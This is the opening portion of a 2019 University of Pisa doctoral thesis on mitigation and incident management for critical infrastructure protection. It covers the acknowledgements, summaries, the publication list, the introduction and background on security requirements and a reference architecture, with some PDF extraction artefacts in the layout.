C RITICAL I NFRASTRUCTUREPROTECTION M ITIGATIONAND I NCIDENT M ANAGEMENTMETHODOLOGIESFOR

(1)

UNIVERSITÁ DIPISA

DOTTORATO DI RICERCA ININGEGNERIA DELL’INFORMAZIONE

M

ITIGATION AND

I

NCIDENT

M

ANAGEMENT

METHODOLOGIES FOR

C

RITICAL

INFRASTRUCTURE

PROTECTION

DOCTORALTHESIS

Author

Alessandro Cantelli-Forti

Tutors

Prof. Fabrizio Berizzi, Prof. Michele Colajanni, Dr. Amerigo Capria

Reviewers

Prof. Lorenzo Donatiello, Dr. Luca Allodi

The Coordinator of the PhD Program

Prof. Marco Luise

Pisa, 04 2019 XXXI

(2)

(3)

This thesis is dedicated to Gianna Dalle Mese. Gianna (Prof. Enzo Dalle Mese is her husband) nourished my palate and my mind with the delicious dishes and the most nutritious conversations of my life. Thank you.

(4)

(5)

"A Voyage data recording is that certainty produced at the point where the imperfections of memory meet the inadequacies of documentation" Patrick Lagrange

(6)

(7)

Acknowledgements

A

CKNOWLEDGEMENTS.

Undertaking the PhD has been a truly changing experience, both for my frame of ref-erence and objectives. Definitely, it would not have been possible without the support and guidance that I received from my tutors. Thus, my reference points of navigation in the field of research have been completely translated, like sailing from one hemisphere to the other of the same globe. Without the guidelines of Prof. Michele Colajanni, I would never have been able to introduce a change in perspective and to produce my first scientific contributions. I thank him for his patience, without which this new route would have led to a shipwreck. I would like to express my deep gratitude to Prof. Berizzi and Prof. Martorella for creating my working conditions and Dr. Capria for bringing me home from the most dangerous adventures under the sea. Thank-you very much to Dr. Ing. Stancari for her continuous support. The proposed research was par-tially funded by the following international grants:

1. X-WALD: “Avionic X-Band weather signal modelling and processing validation trough real data acquisition and analysis”, EU-FP7-JTI agreement no 619236, 2014-2016

2. SCOUT: “Multitech Security System for interconnected space control ground sta-tion”, EU-FP7 agreement no 607019, 2014-2018

3. NATO AFSC-SSS-IA: “Implementation of Alliance Future Surveillance (AFSC) and Control Small Scale Studies (SSS) on Information Assurance (IA)”, agree-ment STO-OCS(2018)0073, 2018-2019

(8)

(9)

Ringraziamenti

R

INGRAZIAMENTI

Affrontare un corso di Dottorato di Ricerca è stata l’esperienza che mi ha profonda-mente cambiato, sia nei mei punti di riferimento che nei miei obiettivi. Senza dubbio non l’avrei potuta portare a termine senza il supporto e la guida dei miei tutori. Questo è talmente vero che tutti i miei punti di riferimento ed il significato stesso di fare Ri-cerca si sono spostati, come se avessi viaggiato da un emisfero all’altro. Senza la guida del Prof. Michele Colajanni non sarei mai stato capace di iniziare un cambiamento di prospettiva per produrre dei contributi chiari. Lo ringrazio quindi per la sua pazienza senza la quale la nuova rotta mi avrebbe portato solo sugli scogli e spero che questo sia solo l’inizio. Esprimo anche tutta la mia gratitudine ai Direttori Prof. Martorella e Prof. Berizzi, per aver costruito e mantenuto il Laboratorio RaSS. Ringrazio il Dr. Capria per avermi sempre riaccompagnato da tutte le avventure piu’ pericolose. Grazie infine al Dott. Ing. Stancari per il suo costante supporto e pazienza. La mia attività è stata parzialmente finanziata dai seguenti progetti di ricerca internazionali:

1. X-WALD: “Avionic X-Band weather signal modelling and processing validation trough real data acquisition and analysis”, EU-FP7-JTI agreement no 619236, 2014-2016

2. SCOUT: “Multitech Security System for interconnected space control ground station”, EU-FP7 agreement no 607019, 2014-2018

3. NATO AFSC-SSS-IA: “Implementation of Alliance Future Surveillance (AFSC) and Control Small Scale Studies (SSS) on Information Assurance (IA)”, agree-ment STO-OCS(2018)0073, 2018-2019

(10)

(11)

Summary

S

UMMARY. The research in the system field of Developing innovative cybersecurity

techniques for the protection of critical infrastructurescovers the methodologies for the protection of critical infrastructures that must pursue various objectives in three main phases: Prevention, Detection, and Reaction. In particular, this thesis describes the study, design and implementation of solutions for the Detection and Re-action phases of Critical Infrastructure Protection with a special focus on Mitigation and Incident Management methodologies of reaction. Nowadays, the protection of a critical infrastructure must cover both the physical and the cyber realm. We will pro-pose novel solutions on the latter, while taking into account the necessary iterations between both.

After giving an introduction and definition of critical infrastructure, the research is introduced by a critical analysis of the state-of-the-art and proposes new models for the integration of existing technologies under those conditions resulting from the intrinsically distributed and heterogeneous nature of most critical infrastructures. The tools initially described as a reference will be the basis used to bring the reasoning towards the experimental context and then to the innovations proposed in the detection, prevention and reaction phases.

Subsequently, the Detection issues are presented through anomaly detection solu-tions applied to an Intrusion Detection Systems (IDS) supported by a novel system network architecture. This architecture is based on the paradigm of Software Defined Network (SDN) and was experimented in a real ground base station critical infrastruc-ture. During the practical experimentation and the implementation of the prototypes, limitations and trade-offs related to the application of cybersecurity technologies in critical infrastructures have been highlighted.

Original solutions for the Mitigation phases are suggested as an innovative Hon-eyNet integrating a virtualized decoy-system and an accurate fingerprinting of the at-tackers. Mitigation phases experimentation has also been conducted on the network of the critical infrastructure, a ground base station for satellite communications.

The resulting observations of the research on the Detection and Mitigation phases led to original solutions for the an accurate fingerprinting of the attackers as means of an

(12)

innovative HoneyNet integrating a virtualized decoy-system. The idea is to force each attacker to interact with his own synthetic system thus improving existing solutions that are based on stateless representations of the decoy-system. Our innovative approach proposes to enable a stateful honeypot able to recognize multiple intrusions of the same adversary.

Incident Management is one of the most important topic in critical infrastructure protection. The main research results in this field that will be presented are focused on critical transport systems components and published in papers, international technical reports, surveys, and relevant juridical reports. Serious structural problems for the state-of-the-art forensic devices was evidenced by two case studies and led to the description of some novel solutions that exploit cryptographic technologies.

(13)

Sommario

S

OMMARIO. La ricerca nel campo del dello Sviluppo di tecniche innovative di

cy-ber sicurezza per la protezione delle infrastrutture critichecopre le metodologie per la protezione delle infrastrutture critiche che devono perseguire diversi obiet-tivi in tre fasi principali: Prevenzione, Rilevazione e Reazione. In particolare, questa tesi descrive lo studio, la progettazione e l’implementazione di soluzioni per le fasi di Rilevazione e Reazione nella protezione delle Infrastrutture Critiche con particolare attenzione ai metodi di Mitigazione e Gestione degli incidenti.

La ricerca è introdotta da un’analisi critica dello stato dell’arte e propone nuovi modelli per l’integrazione di tecnologie già esistenti in condizioni che derivano dalla natura intrinsecamente distribuita ed eterogenea della maggior parte delle infrastrutture critiche. Oggigiorno, la protezione di una infrastruttura critica deve coprire sia l’am-biente fisico che quello virtuale. Verranno proposte soluzioni innvoative su quest’ulti-mo, pur consdierando le reciproche iterazioni. Gli strumenti inizialmente descritti come riferimento saranno i mattoni di base utilizzati per guidare la lettura verso il contesto sperimentale e poi verso le innovazioni proposte.

I problemi di rilevamento sono presentati tramite soluzioni di rilevamento delle ano-malie applicate a un sistema di Intrusion Detection (IDS) supportato da una nuova ar-chitettura del sistema rete. Questo tipo di arar-chitettura si basa sul paradigma di Software Defined Network (SDN) ed è stata sperimentata in una vera infrastruttura critica, una stazione base di terra per comunicazioni satellitari. Durante la sperimentazione prati-ca e l’implementazione dei prototipi, sono state evidenziate limitazioni e compromessi relativi all’applicazione delle tecnologie di cyber sicurezza nelle infrastrutture critiche. Soluzioni originali per le fasi di mitigazione sono esposte come un innovativo Ho-neyNetche integra un decoy-system in ambiente virtuale ed un fingerprinting accurato degli attaccanti. Anche la sperimentazione della fase d mitigazione è stata condotta sulla rete dell’infrastruttura critica, una stazione base per le comunicazioni satellitari.

Le osservazioni prodotte della ricerca sulle fasi di Rilevamento e Mitigazione hanno portato a soluzioni originali per un fingerprinting accurato degli aggressori per mezzo di un innovativo HoneyNet che integra un decoy-system virtuale. L’idea è di costrin-gere ogni aggressore ad interagire con il suo sistema fittizzio, migliorando, così, le

(14)

soluzioni esistenti basate su rappresentazioni senza stato del decoy-system. Il nostro approccio innovativo propone di abilitare uno stateful honeypot in grado di riconoscere contemporaneamente molteplici intrusioni dello stesso avversario.

La gestione degli incidenti è uno degli argomenti più importanti nella protezione delle infrastrutture critiche. I principali risultati di ricerca, esposti in questo campo, sono incentrati su alcuni sistemi che compongono la infrastruttura di trasporto critica e pubblicati su rivista, relazioni tecniche internazionali e perizie giuridiche pertinenti. Gravi problemi strutturali per i dispositivi di registrazione dei dati sono stati evidenziati da due casi di studio ed hanno portato alla descrizione di alcune nuove soluzioni che sfruttano le tecnologie crittografiche.

(15)

List of publications

International Journals and Book Chapters

1. Cantelli-Forti, M. Colajanni, “Information security in critical transport systems: Case studies and lessons learned”, Journal of Cybersecurity, Nov 2018.

2. L. Fiorentini, L. Marmo and A. Cantelli-Forti, Book chapter “Fire on board of a ferryboat”, Book chapter in Principles of Forensic Engineering Applied to Indus-trial Accidents, pp. 280-296, ISBN: 978-1-118-96280-0, Wiley, Gen 2019.

International Conferences and Workshops with Peer Review

1. A. Cantelli-Forti, M. Colajanni, “Adversarial fingerprinting based on stateful hon-eypots”, IEEE Computer Society’s CPS proceedings of The 2018 International Conference on Computational Science and Computational Intelligence (CSCI’18), 13-15 Dec 2018.

2. A. Cantelli-Forti, “Forensic Analysis of Industrial Critical Systems: The Costa Concordia’s Voyage Data Recorder Case”, Proc. of 2018 IEEE International Con-ference on Smart Computing (SMARTCOMP), pp. 458-463, 18–20 June 2018. 3. Callegari, C., Forti, A.C., D’Amore, G., De La Hoz, E., Echarri, D.,

García-Ferreira, I., López-Civera, G. “An architecture for securing communications in critical infrastructure”, Proc. of the 13th International Joint Conference on e-Business and Telecommunications, pp. 111-120, 2016.

4. Capria A., Moscardini C., Conti M., Cantelli Forti A., Berizzi F. and al, “Passive radar research activity at Lab RaSS-CNIT”, presented to IEEE South Australia Workshop on Passive Radar, Adelaide, Australia, 23-24 November, 2015.

5. A. Capria, D. Petri, C. Moscardini, M. Conti, A. Cantelli-Forti et al., "Software-defined Multiband Array Passive Radar (SMARP) demonstrator: A test and eval-uation perspective", Proc. of OCEANS 2015, pp. 1-6, Genoa, 2015, 18-21 May 2015.

(16)

National Conference

1. B. Chiaia, R. Sicari, A.Cantelli-Forti et al., “Incendio della Motonave Norman Attlantic: Indagini Multidisciplinari in Incidente Probatorio”, IF CRASC Confer-ence on Forensic Engineering, Politecnico di Milano, 14-16 Settembre 2017.

International Technical Reports

1. C. Callegari, M. Martorella. A. Cantelli-Forti et al., NATO STO TECHNICAL REPORT “SSS on Information Assurance (IA)”, August 2018

2. F. Berizzi, C. Callegari, A. Cantelli-Forti, et al., “CYBERSENS SUBSYSTEMS”, SCOUT Project technical report, October 2017

3. F. Berizzi, A. Cantelli-Forti, C. Callegari et al., “Test Planning and Experimental Set-up”, SCOUT Project technical report, November 2017

4. F. Berizzi, A. Cantelli-Forti, C. Callegari et al., “SCOUT DEMONSTRATOR”, SCOUT Project technical report, November 2017

5. F. Berizzi, A. Cantelli-Forti, C. Callegari et al., “Results on data analysis and system validation”, SCOUT Project technical report, April 2018

6. C. Callegari, A. Cantelli Forti, I. Marsá Maestre, G. López Civera, D. Echarri, I. García-Ferreira: “Preliminary Results on Cybersens Subsystem, final version”, SCOUT Project technical report, October 2016

7. F.Berizzi et al.: “Demonstrator scenario, requirements and architecture”", SCOUT Project technical report, October 2016

8. C. Callegari, A. Cantelli Forti, I. Marsá Maestre, G. López Civera, D. Echarri, I. García-Ferreira: “Preliminary Results on Cybersens Subsystem, final version”, SCOUT Project technical report, October 2016

9. D. Adami et al.: “Operative and system requirements with scenario definition”, Multitech SeCurity system for intercOnnected space control groUnd staTions (SCOUT) Project technical report, June 2016

10. M. Rosa Zurera et al.:“Risk analysis preliminary results”, SCOUT Project techni-cal report, June 2016

11. D. Adami et al.: “SCOUT system architecture”, SCOUT Project technical report, June 2016

12. C. Callegari, A. Cantelli Forti, I. Marsá Maestre, G. López Civera, D. Echarri, I. García-Ferreira: “Preliminary Results on Cybersens Subsystem”, SCOUT Project technical report, June 2016

(17)

International Workshops

1. A. Cantelli Forti, “Ship’s digital evidences as an open format data logger of a network of sensors”, lecture at the Electronic and Technical Evidence Seminar, Marine Accident Investigation Branch (UK Government Agency), Southampton, 25-27 July 2017.

2. A. Cantelli Forti: “Evidence recovery and analysis from the Costa Concordia’s digital data by means of forensic techniques: turn data into information”, guest speaker at European Maritime Safety Agency, EMSA Seminar on Voyage Data Recorders and Electronic Evidence at Cranfield University, January 2016.

3. A. Cantelli Forti: “The importance of Open Format for storing digital data asyn-chronously generated from multiple sensors”, speaker at European Marine Acci-dent Investigators’ International Forum EMAIIF, April 2016.

(18)

CHAPTER

1

Introduction

As used by governments, the term Critical Infrastructure refers to the description of assets that are essential for the functioning of a society and its economy. Critical In-frastructures provides the essential services that support societies and serve as the back-bone of economy, security, and health as they guarantee the most important needs such as: power, water, communication and transportation systems we rely on [54]. As de-fined, for example, not only nuclear power plants or ministries but also universities and large cruise ships containing thousands of people are critical infrastructures. Critical infrastructure Protection is therefore a concept that relates to the preparedness and re-sponse to serious incidents. This doctoral thesis includes both the description of some techniques for defending Critical Infrastructures at the state of the art and proposes in-novative solutions in the field of cybersecurity [18] and its integration with physical protection [13]. In particular the research focuses the critical transport and telecommu-nication infrastructures and includes the participation in case studies and experiments on real and operational systems.

The system field of Developing innovative cybersecurity techniques for the protec-tion of critical infrastructuresincludes multistage methodologies grouped in three main phases: Prevention, Detection, and Reaction (Fig. 1.1). This research tackles the study, design and implementation of cybersecurity solutions for the Detection and Reaction phases with a special focus on Mitigation and Incident Management reaction method-ologies.

The research goes through a critical analysis of the state-of-the-art, fundamental principles of cybersecurity are presented in an introductory description by means of a picture of an ideal Critical Infrastructure. A representation of a speculative Surveillance and Control communication architecture is provided, together with the linked threats and vulnerabilities. Consequently, a list of requirements (functional and non-functional

(22)

Figure 1.1: Prevention, Detection and Reaction phases.

requirements) is drawn up and to these a list of appropriate procedures and technical security measures is mentioned. The proposed actions take into account both current threats and future cybersecurity challenges and paves the way for the next phases of the research described in Chapters III and IV.

The Detection phase is proposed through anomaly detection techniques applied to an Intrusion Detection Systems (IDS) exploiting a novel system network architecture based on the paradigm of Software Defined Network (SDN). The proposed architecture was experimented and validated in a real critical infrastructure, a satellite communica-tions ground base station[13]. The early detection and localization of cyber attacks is carried out by applying signature-based techniques, effective in detecting well-known attacks, and anomaly based techniques, effective in also detecting novel (e.g., zero-day) attacks. During the practical experimentation and the implementation of the prototypes some technological limits related to the implementation of cybersecurity in critical in-frastructures have been evaluated as a trade-off between functionality and security. As a prime example of this, confidentiality ensured by cryptography does not allow the simultaneous operation of signature-based IDS systems.

Mitigation phase original solutions have also been tested in the critical infrastructure for satellite transmissions. Experiments were carried out of an innovative HoneyNet in-tegrating a virtualized decoy-system [13] for a resilient and self-adaptive configuration. This configuration suggested a further step and use for an accurate fingerprinting of the attackers. The main objective is to lead each attacker to interact with an unique virtualized environment and to extend effectiveness of current solutions that are based on stateless representations of the decoy-system. As a consequence, they suffer of two drawbacks: i) they are easily identified by expert attackers; ii) they are unable to track progresses of specific intrusions carried out by the same attacker especially in large systems that support critical infrastructures. For these reasons, our approach proposes an innovative solution that enables a stateful honeypot to be able to recognize multiple intrusions of the same adversary and to redirect each of them to the same synthetic decoy-system left by the previous intrusion, including the installation of rootkits and backdoors, modifications of the file system, and so on. The research idea achieves the

(23)

further benefits of slowing down the opponent operations and fingerprinting his attack for subsequent enrichment of adversarial intelligence and attribution systems [18].

Being considered one of the most important topics in Critical Infrastructure Pro-tection, the main research in the Incident Management phase are focused on critical transport systems and published in papers, international technical reports, surveys, and relevant juridical reports. More specifically, any critical infrastructure for transporta-tion relies on safety-critical systems that have to meet stringent requirements. System performance and operations are continuously monitored by means of multiple sensors producing large amount of data and relevant information is preserved in so called event data recorders. Research on this topic [17, 19] highlights some present limitations in the exploitation of recorded data that are fundamental for the legal reconstruction of the scenario in case of serious malfunctions and incidents. The study of this phase shows some of both the legal limits of current regulations and the technical limits of their ap-plicability. Real examples are related to investigations referring to the Costa Concordia and Norman Atlantic accidents and are compared with the results of accidents of other means of transport in which Information Assurance has not been preserved. Possible solutions are proposed to guarantee information security in terms of data integrity and availability that are essential to identify and attribute human and/or machine responsi-bilities. This thesis is organized as follows. Chapter II is "motivational", it contains a detailed description of terms and contexts of interest; Chapter III describes a novel and experimental implementation of Detection techniques as Chapter IV defines the rela-tive phase of Mitigation and the subsequent advances in research. Chapter IV pertains Incident Management first highlighting the limits of current implementations and then proposing novel advances through the use of various technological transfers. The last chapter draws a reasoned list of lessons learned.

(24)

CHAPTER

2

Background, Motivation and Requirements

2.1

Background

Since the mid-1990’s, dramatic experiences caused by natural or man-made disasters have made the understanding of dependency of our society on those infrastructures that, if disrupted or destroyed would seriously compromise our quality of life and/or overall functioning of the society an urgent matter. Therefore, critical infrastructure protection has become a general label for a range of activities undertaken jointly by government and operators of key locations, facilities and systems to ensure an adequate management risk. In 1996, the USA was the first Nation to have a wide-reaching crit-ical infrastructure protection program in place. Its Patriot Act of 2001 defined critcrit-ical infrastructure as those "systems and assets, whether physical or virtual, so vital to the United States that the incapacity or destruction of such systems and assets would have a debilitating impact on security, national economic security, national public health or safety, or any combination of those matters".

Protection of critical buildings, plants and infrastructure is one of most important is-sues also for the EU community. The European Programme for Critical Infrastructure Protection (EPCIP) has been laid out in EU Directives by the Commission1_{. It has}

proposed a list of European critical infrastructures based upon inputs by its member states. The Justice and Home Affairs (JHA) Council in June 2008 approved the text of the Directive on the identification and designation of European Critical Infrastructure and the assessment of the need to improve their protection (Directive 2008/114/EC). The approval of the Directive, whose proposal was presented by the Commission in December 2006 (Act COM(2006) 786), represents the final step of a normative path undertaken by the European Council of October 2004, responding to the Commission’s

(25)

2.1. Background

requirements to prepare a global strategy for the protection of Critical Infrastructures (Act COM(2004) 702). The Directive lays out the measures established by the Com-mission in order to guarantee the correct operation of European Critical Infrastructures. In the European context, the definition of critical infrastructure can refer to the doc-ument “Critical Infrastructure Protection in the fight against terrorism - COM(2004) 702”: Critical infrastructures consist of those physical and information technology fa-cilities, networks, services and assets which, if disrupted or destroyed, would have a serious impact on the health, safety, security or economic well-being of citizens or prevent the effective functioning of governments in the Member States. Critical infras-tructures extend across many sectors of the economy, including banking and finance, transport and distribution, energy, utilities, health, food supply and communications, as well as key government services. Following both definitions, and the cited government documents, critical infrastructures include [32, 54]:

• Energy installations and networks (e.g. electrical power, oil and gas production, storage facilities and refineries, transmission and distribution systems);

• Communications and Information Technology (e.g. telecommunications, broad-casting systems, software, hardware and networks including the Internet, space control ground stations and others);

• Finance (e.g. banking, securities and investment);

• Health Care (e.g. hospitals, health care and blood supply facilities, laboratories and pharmaceuticals, search and rescue, emergency services);

• Food (e.g. safety, production means, wholesale distribution and food industry); • Water (e.g. dams, storage, treatment and networks);

• Transport (e.g. airports, ports, intermodal facilities, railway, ships and mass transit networks, traffic control systems);

• Production, storage and transport of dangerous goods (e.g. chemical, biological, radiological and nuclear materials, CBRN);

• Government (e.g. critical services, facilities, information networks, assets and key national sites and monuments);

• National monuments, symbols and icons that represent national heritage, tradi-tions and values..

Infrastructure systems are characterized by a high degree of interconnection. Many physical, virtual and logical dependencies are not apparent until a crisis occurs and the connection breaks down. This high level of interdependence can lead to cascading shut-downs. At the same time, smaller and smaller disruptions are enough to cause dramatic consequences in complex systems. Malevolent acts may involve effects that are more severe than expected with accidental risk. Some examples of relevant consequences include:

• Injuries to the public or to workers; • Environmental damage;

(26)

• Direct and indirect financial losses to the company and to suppliers and associated businesses;

• Disruption to the national economy, regional, or local operations and economy; • Loss of reputation or business viability;

• Need to evacuate people living or working near the facility;

• Excessive media exposure and related public concern affecting people that may be far removed from the actual event location.

In this scenario, a security system for the protection of the space control ground sta-tions against physical and cyber attacks is of great important nowadays because of the central role of such a station in offering an efficient and continuous services to govern-mental assets and citizens about satellite communication, global navigation system and Earth Observation (EO) for national territory surveillance as well as for remote sens-ing of environmental monitorsens-ing. In the same way an effective Incident Management system requires the recording of events, useful to reconstruct the scenario, before and during an accident. Accidents in the transport world, such as those taken into consid-eration, combine the challenge of having to record data during a catastrophic event, as well as potentially destructive for the recording devices themselves. This is particu-larly relevant in the world of naval transport where, since always, safety is improved through the motto "learning the hard way", that is, observing carefully when something something unexpected happens and then improve accordingly [27]. The words accident and incident are often confused, both stemming from the same ultimate Latin root. In the case of events that undermine the safety of a means of transport, it can be either accidental or incidental depending on whether there is fraud, fault or is completely "fortuitous". Instead, we define an Information Assurance problem as an incident and the procedure of reaction is called Incident Management.

The importance and the quality of a security system is determined by a few key factors of a critical structure, which include [32]:

1. The hazard degree; 2. The vulnerability degree;

3. The possible consequences of an Incident caused by an illegal intrusion;

4. The interest of malevolent to attack a critical; infrastructure or the superficiality (or the fraud) of the operators of the critical infrastructure which they carry to reduced safety or security conditions.

The vulnerability analysis is mainly based on quantitative and qualitative risks. They must be ordered in a priority list in order to establish the main countermeasures. The main objectives of a security system must fit the following basic strategies for minimiz-ing the risks [32]:

1. Deter (Rrevention); 2. Detect;

(27)

2.2. Motivation

The main steps for the assessment methodology of the vulnerability of a security surveil-lance system are

1. Assets;

2. Threat assessment;

3. Critical infrastructure vulnerability analysis; 4. Risk assessment;

5. Countermeasures analysis.

The resulting countermeasures are [32]:

1. Identification of physical and cyber security systems: perimetral barriers, detec-tion of physical and cyber intrusions, access control, internal guards;

2. Identification of process security systems; 3. Management of the surveillance procedures;

4. Detection of hazard situations and assessment capability; 5. System reconfiguration procedures in the case of network fault.

The bibliography of this thesis includes excellent contributions concerning the state of affairs represented in this paragraph, as [9, 11, 24, 53, 56, 56]. The existing literature and the case studies described in the next chapters have prompt the need to advance the state of the art both through a better mitigation and attribution system and trought a critical analysis of the current Incident Management techniques in the transport domain. Therefore innovative solutions, based also on the transfer technological, are proposed.

2.2

Motivation

An open, tolerant, peaceful, and vibrant society offers citizens the conditions neces-sary to flourish economically, intellectually, physically, and emotionally [53]. These conditions allow members of whatever civil society to thrive, maintaining tolerance and social discourse. Once an adversary successfully breaches a critical infrastructure, even not to kill and injure, these effects can be devastating. Threat perception will then foster insecurity and prompt visions of an inescapable cycle of dangers. Dispersed infrastructure in key sectors like transport and networks are sensitive and difficult to protect. Elaborating from [29], we can say that dispersed infrastructure are prone at the same time to realistic threat, that refers to potential harm to tangible or concrete objects (e.g., money, land, human life), and to symbolic threat, including landscape and nat-ural/cultural heritage. We aim to develop novel management criteria and instruments able to dispel insecurity, protecting infrastructure and communicating trust and confi-dence in the self defense capabilities that can generate psychological well being.

A generic Critical Infrastructure encloses several safety-critical or life-critical as-pects which may lead to the following outcomes upon failures or malfunctions: death

(28)

or serious injury to people, loss or severe damage to equipment/property, environmen-tal harm or paranoia and general distrust in essential services such as water supply. Besides damage from hackers infecting systems with ransom viruses, blocking opera-tionality and/or causing intentional damages to force victim infrastructures to pay the ransom. As government or criminal organizations become more sophisticated it be-comes of central importance that our critical infrastructure is prepared to absorb and promptly react to the insurgence of unknown attackers and attack vectors. This must involve a combination of technological and human resources that are capable of iden-tifying, measuring, reacting, and containing highly targeted attacks in a timely fashion, while operating under strong operative and data limitations.

The results or consequences of cyber attacks can be difficult to define, precisely because the damage can be greater than expected or known. Operationally, it is impos-sible to know which attacks or what information does the attacker has at disposal when planning or delivering an attack. On the other hand, infrastructure monitoring is always incomplete, threats are often unknown, and reaction plans and resource allocations are widely suboptimal. This challenge underlies the unmanageability of modern complex systems across all economic sectors. The transport sector is a prime case: geograph-ically vast infrastructures, complex human-system interactions, and interdependencies across different transport applications cover the wide range of sources of uncertainty against which all sectors deal with.

As said, threats against the integrity of a critical infrastructure are either intentional or accidental. Are accidental those interruptions to the normal activities of a criti-cal infrastructure caused by unexpected events, negligence or errors in the design and management of the systems. Instead a deliberate and intentional act against a critical infrastructure is to be considered taking into account the repercussions on the popula-tion of the napopula-tion and the asymmetry (or lack of proporpopula-tionality) between an attack and the extent of the consequences.

Accidents (or Incidents) on critical infrastructures, which are complex organiza-tions, can not be attributed to a single cause, even if they have been, for a long time, explained as a failure of technology or an operators’ error. What these explanations have in common is the attribution of every responsibility of the incident not to the or-ganization and its operating practices, but to the most convenient scapegoat: human error [24]. However, let us consider as an example the accident of the Costa Concor-dia ship, which primarily represents a component of a critical transport infrastructure. When an event like this happens, it’s all the organization that fails: the ship’s manage-ment, the company’s risk and security management system, the control system. In this case, not just some of the operators who are closest to the task seem to have shown par-ticular negligence. The analysis of the major organizational disasters showed, in fact, the importance of organizational factors in the etiology of such events. The proximate causes of an accident are the product of underlying causes and organizational factors. Many accident investigations make the same mistake in the definition of causes: they tend to focus mainly on the person who made the mistake or the technical component that did not work properly. It is then necessary to investigate the organizational factors that have favored the disaster, beyond the human error -certainly predominant- and the technical failures. Yet, the exploitation of recorded data by specific Critical Infrastruc-ture subsystems is fundamental for the legal reconstruction of the scenario in case of

(29)

2.3. Cyber Security Pillars

serious malfunctions and accidents and is essential to identify and attribute human and / or machine responsibilities. These subsystems are called Event Data Recorders and must guarantee information security in terms of data integrity and availability.

It is not possible to introduce the concepts and the new paradigms described in this re-search without having made some reference to the semantic field of cybersecurity. We therefore describe the fundamental concepts that are derived from all critical infrastruc-tures in sections 2.2 and 2.3. The rest of the chapter contains a reasoned description of the Critical Infrastrucute Protection requirements.

2.2.1 Modeling and Simulation methodological approaches

Modeling and Simulation approaches can study inter-dependencies for critical infras-tructures protection. Any critical infrastructure subsystem is linked to the other by means of dependencies and some of them involve cybersecurity operations and/or hu-man behavior. Moreover, critical infrastructures are joined and heavily dependent on each other. For these reasons, in the event of disruption of the operation of a single criti-cal infrastructure, other infrastructures may have adverse effects, both directly and indi-rectly. As stated in [23] and demonstrated by previous work on this subject [36, 47, 48], a challenge is to provide formalism, methodologies, and tools to model the entire com-plex system composed of humans, critical infrastructures and their own connections. Agent Based Modelling (ABMS) and federated simulation are the more promising tech-niques to study the inter-dependencies in critical infrastructures and their benefits can be jointly exploited [23]. These techniques have been studied and taken into consid-eration even if the methodology for the case studies presented in this work uses an example driven approach. This method was necessary since the starting points of this research have been case studies made available by the end-users (Italian Space Agency and NATO) or based on the incident management of critical transport infrastructures. However, were not envisaged event propagation driven models compatible with the cited methodologies.

2.3

Cyber Security Pillars

The information and communication technology (ICT) security of a Critical Infrastruc-ture system is analyzed with respect to the properties of integrity, availability, confiden-tiality, authenticity and non-repudiation. A system consisting of different assets may be subject to a number of threats or potential attacks. If the system is vulnerable with respect to a threat, ICT security may not be fulfilled which leads to a risk. Hence, a risk exists if one of the assets of the system is vulnerable to a threat, as depicted graphically in Fig. 2.1

Following subsections provide the reader with the definition of the main security pillars that will be taken into consideration for the rest of the document. As introduced, these are the basic technologies, the bricks, with which the strategies of Detection, Mit-igation and Reaction are implemented. Paragraphs 2.3 to 2.7 follow the representative and logical outline of the contents as defined by the unclassified Technical Report Tem-plate of the Science and Technology Organization and the NATO Groups on Security.

(30)

Figure 2.1: Risk as the intersection of an asset, threat and a vulnerability.

2.3.1 Confidentiality

The objective of confidentiality, as considered in this project, is assuring that infor-mation is not made available or disclosed to unauthorized parties, without hindering authorized parties from accessing the information.

2.3.2 Authenticity and Integrity

We shall understand the capability to verify the validity of a piece of data (after trans-mission or storage). This includes being able to verify that the message was actually transmitted or stored by an authorized source (i.e. a device having a valid cryptographic key), and also being able to verify that the information was neither accidentally nor in-tentionally modified after its transmission/storage by the legitimate user. Note, that if an authentic / trusted device gets stolen, it is still considered as an authentic device within the system since it can produce data that is signed using the correct key.

2.3.3 Availability

The definition of availability is quite straightforward, just being the degree to which a system, subsystem, or equipment is operable and in a committable state at the start of a mission, when the mission is called for at an unknown, i.e., a random, time. Simply put, availability is the proportion of time a system is in a functioning condition.

2.3.4 Non-Repudiation

Although they share similar technologies and paradigms, Authentication and Non-Repudiation are two different sorts of concepts. Regarding digital security the meaning

(31)

2.4. Critical Infrastructure reference architecture

and application of non-repudiation describes a service that provides proof of the in-tegrity and origin of data.

2.4

Critical Infrastructure reference architecture

In order to identify risks, the architecture of the system, i.e., the properties and re-lationships between assets, must be known. Based on the capability requirements, a high-level communication architecture model is defined, which allows identifying the different assets which might be subject to threats and vulnerabilities leading to risks in the infrastructure. Given the high modularity taken into consideration when defining such a network, the identified communication infrastructure is general enough to be also applied in very diverse contexts by simply taking into consideration all or part of the different subsystems from time to time. Such a modular approach also allows for scal-ability and robustness. In a nutshell, from the architectural point of view, the reference communication network can be seen as the interconnection of several heterogeneous networks. The reference communication network can be split into 4 components:

• Surveillance

• Data collection and processing • Command and control

• Communication infrastructure

Although this description introduces a strict separation between components, in practice these components might be intertwined.

2.4.1 Reference Architecture assumptions

In this sub-section, there follows a brief discussion about the general assumption made in this phase. What is described in this section is an abstraction used to define the concepts underlying the example architecture which implements the research studies as described in Chapters III and IV. As discussed in the previous section, the foreseen communication architecture is very general and modular, so that roughly every kind of technology can be applied in the system. Nonetheless, a TCP/IP protocol stack is as-sumed. Also, it is important to highlight that, referring to the discussed communication systems, none strict assumptions on the different communication links and devices has been done, just distinguishing them into macro-categories that present similarities from the Information Assurance point of view (e.g., a laser link is not distinguished from a WiFi link, being both of them wireless links, united by similar considerations from the security point of view). By authentication the process of checking the authenticity of the data is intended, i.e. if data was transmitted by an authentic source (a source in possession of a valid cryptographic key). The authentication of users in the network, i.e. the process of checking if a user/device has the permission to access the network, is not taken into direct consideration. However, user authentication schemes using e. g. IDs / passwords or bio-metric features that are well suited for the particular appli-cation or device are important for insuring the security of the Critical Infrastructure network. It is hence necessary to also take into consideration security mechanisms that

(32)

prevent an attacker from e.g., recovering the encryption keys stored in a non-persistent moving device an attacker has access to. This requires proper key/certificate revocation mechanisms that are not considered .

2.4.2 Analysis of the architecture and its requirements

Preliminary activities for the design of the cyber protection solution for the critical infrastructures are:

• Architecture definition: this first phase focuses on the study of the reference archi-tecture and scenarios, with the aim of determining the archiarchi-tecture of the Critical Infrastructure communication infrastructure. Hence, this activity is mainly fo-cused on identifying the different types of networks to be used in the different considered scenarios, as well as the common backbone to allow interoperability of such networks.

